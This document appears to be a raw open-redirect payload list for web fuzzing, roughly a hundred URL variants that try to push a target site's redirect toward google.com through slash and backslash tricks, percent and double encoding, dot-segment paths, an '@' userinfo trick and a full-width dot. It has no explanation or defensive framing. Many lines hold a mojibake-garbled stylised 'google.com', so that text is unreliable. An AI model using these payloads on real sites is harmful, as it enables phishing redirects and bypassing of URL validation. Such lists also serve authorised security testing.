///%5cgoogle.com
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%2fgoogle.com
//%5cgoogle.com
/%5cgoogle.com
////%5cgoogle.com
/////google.com
/////google.com/
////google.com/%2e%2e%2f
////google.com/
////google.com/%2e%2e
////google.com//
////google.com/%2f%2e%2e
////google.com/%2f..
///google.com
///google.com/%2f..
///google.com/
//www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
https://google.com/%2f..
////www.google.com/%2f%2e%2e
https://www.google.com/%2f%2e%2e
//google.com/%2f..
//google.com/
https://google.com/
///www.google.com/%2e%2e%2f
////www.google.com/%2e%2e%2f
//www.google.com/%2e%2e%2f
///www.google.com/%2e%2e
https://www.google.com/%2e%2e%2f
//google.com//
///google.com//
https://google.com//
////www.google.com/%2e%2e
https:///www.google.com/%2e%2e
https:///www.google.com/%2f%2e%2e
//google%E3%80%82com
/\/google.com/
\/\/google.com/
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
///google.com/%2e%2e%2f
//google.com/%2e%2e
//google.com
///google.com/%2f%2e%2e
///google.com/%2e%2e
//google.com/%2e%2e%2f
//google.com/%2f%2e%2e
http://google.com:80%40google.com/
//%2f%2fβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
//%2f%2fgoogle.com
/%2f%2fβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
\\google.com
//%2F/google.com
/%2F/google.com
/%5Cgoogle.com
/%5cβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
//%5cβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
////%5cβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
///%5cβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
/\google%252ecom
//\google.com
//\/google.com/
/\/\/google.com/
////google.com
/\google.com
/\/google.com
//google.com/%2E%2E
//google.com/%2F..
//google.com//%2F%2E%2E
http:/\/\google.com
http:google.com
http:/google.com
http:/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
http:β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
https:/%5cgoogle.com/
https%3a%2f%2fgoogle.com%2f
https:/%5cβ“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
https://google%E3%80%82com
https:/\google.com
/////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
/////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚//
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚//
//\/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
//β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚
\/\/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
//β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚//
/\/β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e
//β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e%2f
////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e%2f
//β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2e%2e%2f
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f..
////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f..
//β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f..
////β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f%2e%2e
///β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f%2e%2e
//β“–π‘π—Όπ•π•π‘’.π‘π‘π“‚/%2f%2e%2e
